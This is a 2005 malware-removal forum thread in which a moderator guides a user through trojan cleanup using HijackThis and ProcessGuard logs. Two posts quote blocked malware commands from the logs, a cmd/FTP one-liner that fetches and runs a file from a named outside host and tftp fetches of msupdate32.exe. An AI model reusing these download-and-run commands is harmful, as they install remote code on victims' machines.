Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

help i have trojan horse collected.5.L [RESOLVED]

Started by duglartis , Jun 09 2005 03:25 AM

This topic is locked

#211
duglartis

Posted 29 October 2005 - 01:40 PM

Member

Topic Starter
Member
159 posts

Hi did search does not seem to exist any longer I managed to save this log file on another lock up
hope it is of some help thanks for your help
Process PID CPU Description Company Name
System Idle Process 0
Interrupts n/a Hardware Interrupts
DPCs n/a 0.98 Deferred Procedure Calls
System 4 2.94
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 440 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 484 Services and Controller app Microsoft Corporation
SVCHOST.EXE 656 93.14 Generic Host Process for Win32 Services Microsoft Corporation
TFTP.EXE 1464 Trivial File Transfer Protocol App Microsoft Corporation
SVCHOST.EXE 680 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 744 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 784 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1064 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1204 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1228 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
NVSVC32.EXE 1340 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1444 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1548 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 496 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1012 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1292 HP
Directcd.exe 1356 DirectCD Application Roxio
AVGCC.EXE 1712 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1740 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1768
pgaccount.exe 1852 pgaccount DiamondCS
procguard.exe 1984 GUI Aspect of ProcessGuard DiamondCS
FIREFOX.EXE 1664 Firefox Mozilla
RUNDLL32.EXE 2020 Run a DLL as an App Microsoft Corporation
procexp.exe 1940 2.94 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 656

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000

Edited by duglartis, 29 October 2005 - 01:42 PM.

#212
duglartis

Posted 29 October 2005 - 01:44 PM

Member

Topic Starter
Member
159 posts

thought i might add this process guard log as well hope it is of some help
---Process Guard Log Started---
Sat 29 - 16:54:44 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 29 - 16:54:45 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1400]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 29 - 16:54:45 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 29 - 16:54:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1388]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 29 - 16:54:46 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 29 - 16:54:46 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 29 - 16:54:46 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 29 - 16:54:47 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 29 - 16:54:48 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 29 - 16:54:49 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 29 - 16:54:49 [EXECUTION] "c:\program files\common files\real\update_ob\realsched.exe" was blocked from running
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realsched.exe" -osboot ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\s3tray2.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\s3tray2.exe" ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ rundll32.exe newdev.dll,clientsideinstall \\.\pipe\pnp_device_install_pipe_0.{3342c1de-5cf6-465d-b26d-5f51416ff027} ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [316]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 29 - 16:54:50 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 29 - 16:54:50 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 29 - 16:56:36 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 29 - 16:59:09 [EXECUTION] "c:\program files\microsoft office\office\winword.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\winword.exe" /n ]
Sat 29 - 17:03:48 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 29 - 17:08:31 [EXECUTION] "c:\windows\system32\cleanmgr.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\cleanmgr.exe" /d h ]
Sat 29 - 17:08:33 [EXECUTION] "c:\windows\system32\runonce.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [320]
[EXECUTION] Commandline - [ runonce -r ]
Sat 29 - 17:08:35 [EXECUTION] "c:\windows\system32\runonce.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [320]
[EXECUTION] Commandline - [ runonce -r ]
Sat 29 - 17:09:33 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 29 - 17:09:41 [EXECUTION] "g:\setup.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ g:\setup.exe ]
Sat 29 - 17:10:18 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sat 29 - 17:10:29 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1068]

#213
duglartis

Posted 29 October 2005 - 02:09 PM

Member

Topic Starter
Member
159 posts

one last question if i set the infected drive up as a slave drive and can access through windows explorer is there any way to remove the infected windows operating system without losing the other data on the drive? thaks for your help cheers

#214
Metallica

Posted 30 October 2005 - 04:29 AM

Spyware Veteran

GeekU Moderator
33,101 posts

The objection to your last idea (repairing windows aka installing over the top) is that you came back worse the last time you tried.

It may be a good idea, but you will have to take your time especially setting up ProcessGuard again.

In your last Process Explorer log I noticed TFTP.EXE running.
In the one before that there was the file you couldn't find afterwards.
Those are signs that PG is not configured secure enough.

Regards,

#215
duglartis

Posted 30 October 2005 - 12:43 PM

Member

Topic Starter
Member
159 posts

Ok thanks for the advice I am not going to attempt my suggestion, where to from here so we can get PG configered correctly, incidently the TFT.exe is the application that uses up all the processor free memory have been trying to capture a log file of it
thanks for your help
Cheers

#216
Metallica

Posted 30 October 2005 - 01:20 PM

Spyware Veteran

GeekU Moderator
33,101 posts

Well the first step is to limit the permissions to bare necessity.

On the Security tab go over the list of Filenames one by one.

Remove the ones that should not be there.
By rightclicking and looking at Properties you can find information when in doubt.
If that doesn't tell you enough, feel free to ask here.

Let me know when you are done with this part.

Regards,

#217
duglartis

Posted 31 October 2005 - 01:35 AM

Member

Topic Starter
Member
159 posts

hello again excuse my ignorance i know which applications i have installed but i am not sure what windows processes are the right ones to allow
thanks for your help
Cheers

#218
Metallica

Posted 31 October 2005 - 12:55 PM

Spyware Veteran

GeekU Moderator
33,101 posts

The ones you definitely do not want to mess with are:

svchost.exe
services.exe
winlogon.exe
smss.exe
csrss.exe
lsass.exe
explorer.exe
logonui.exe
rundll32.exe
Those should also be listed on the Protection tab

Usually present and OK are:
iexplore.exe
cisvc.exe
spoolsv.exe
dllhost.exe
mdm.exe
notepad.exe
taskmgr.exe
regedit.exe

Let me know if that leaves anyquestions marks.

Regards,

#219
duglartis

Posted 01 November 2005 - 12:47 AM

Member

Topic Starter
Member
159 posts

hello i have denied access to all but on the list and ones i know are programme related, some of the ones you listed did not show in the security tab dont know if this is normal or not I am away from the computer now until the 8th of November will check back then thanks for your help and look forward to hearing where to next
cheers

#220
Metallica

Posted 01 November 2005 - 12:23 PM

Spyware Veteran

GeekU Moderator
33,101 posts

Once you get back I´d like to see a HijackThis log and a PG log that was recorded during the time you made the HijackThis log.

Regards,

#221
duglartis

Posted 09 November 2005 - 12:46 AM

Member

Topic Starter
Member
159 posts

I am back first is the hijack log file then the pg log file thanks for your help
Logfile of HijackThis v1.99.1
Scan saved at 7:43:11 p.m., on 9/11/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\documents and settings\dug and tania\my documents\downloads\regprot.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://netaccess.co.nz/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O4 - HKLM\..\Run: [RegProt] c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [S3TRAY2] S3tray2.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Yahoo! Pager] D:\PROGRA~1\YAHOO!\MESSEN~1\ypager.exe -quiet
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: Linked ima&ges - C:\Program Files\IEimage\IEimage.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O15 - Trusted Zone: http://www.giftedonl...edusearch.co.nz
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupd...b?1098860877234
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoft.../as5/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{62AC063D-A459-4836-B78F-3EDA6D280C19}: NameServer = 202.37.101.1 202.37.101.2
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe

--Process Guard Log Started---
Wed 09 - 19:07:10 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 09 - 19:07:11 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 09 - 19:07:11 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 09 - 19:07:11 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 09 - 19:07:12 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 09 - 19:07:13 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1336]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 09 - 19:07:14 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 09 - 19:07:14 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 09 - 19:07:14 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1628]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 09 - 19:07:14 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 09 - 19:07:15 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 09 - 19:07:15 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 09 - 19:07:15 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 09 - 19:07:16 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 09 - 19:07:16 [EXECUTION] "c:\program files\common files\real\update_ob\realsched.exe" was blocked from running
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realsched.exe" -osboot ]
Wed 09 - 19:07:16 [EXECUTION] "c:\windows\system32\s3tray2.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\s3tray2.exe" ]
Wed 09 - 19:07:16 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 09 - 19:07:17 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 09 - 19:07:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1872]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 09 - 19:07:19 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 09 - 19:07:22 [EXECUTION] "c:\windows\system32\imapi.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 09 - 19:08:00 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]
Wed 09 - 19:08:04 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 09 - 19:19:25 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]
Wed 09 - 19:21:30 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe
]
Wed 09 - 19:22:03 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ c:\progra~1\grisoft\avgfre~1\avginet.exe /settings 131298 ]
Wed 09 - 19:22:48 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Wed 09 - 19:42:40 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Wed 09 - 19:42:59 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]
Wed 09 - 19:43:11 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" [968]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\documents and settings\dug and tania\my documents\hijack\hijackthis.log ]
Wed 09 - 19:44:00 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_11_2005.txt ]

#222
Metallica

Posted 09 November 2005 - 01:08 PM

Spyware Veteran

GeekU Moderator
33,101 posts

Hi Doug,

Can you please use Agent Ransack to look for any files containing:
darksensui

Don't do anything yet, just let me know the results.

Regards,

#223
duglartis

Posted 10 November 2005 - 12:23 AM

Member

Topic Starter
Member
159 posts

hi there downloaded and ran nothing found
i guess this isnt good i had a couple of interesting things happen last night i have included the PG logs

Wed 09 - 20:09:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ tftp.exe -i 0.0.0.0 get msupdate32.exe ]
Wed 09 - 20:12:15 [EXECUTION] "c:\windows\system32\gbzhy.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "gbzhy.exe" ]
Wed 09 - 21:02:07 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ tftp.exe -i 0.0.0.0 get msupdate32.exe
Thu 10 - 19:22:43 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [916]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wera.tmp.dir00\manifest.txt ]
hope this is of somehelp
thanks for your help
cheers

Edited by duglartis, 10 November 2005 - 12:33 AM.

#224
Metallica

Posted 10 November 2005 - 12:41 PM

Spyware Veteran

GeekU Moderator
33,101 posts

Can you try and find manifest.txt

I'm curious about it's content if it exists.

Regards,

#225
duglartis

Posted 11 November 2005 - 12:48 AM

Member

Topic Starter
Member
159 posts

found this under manifest txt hope it makes sense cheers
C:\WINDOWS\SYSTEM32\faultrep.dll (65 KB, 31/03/2003 12:00:00)
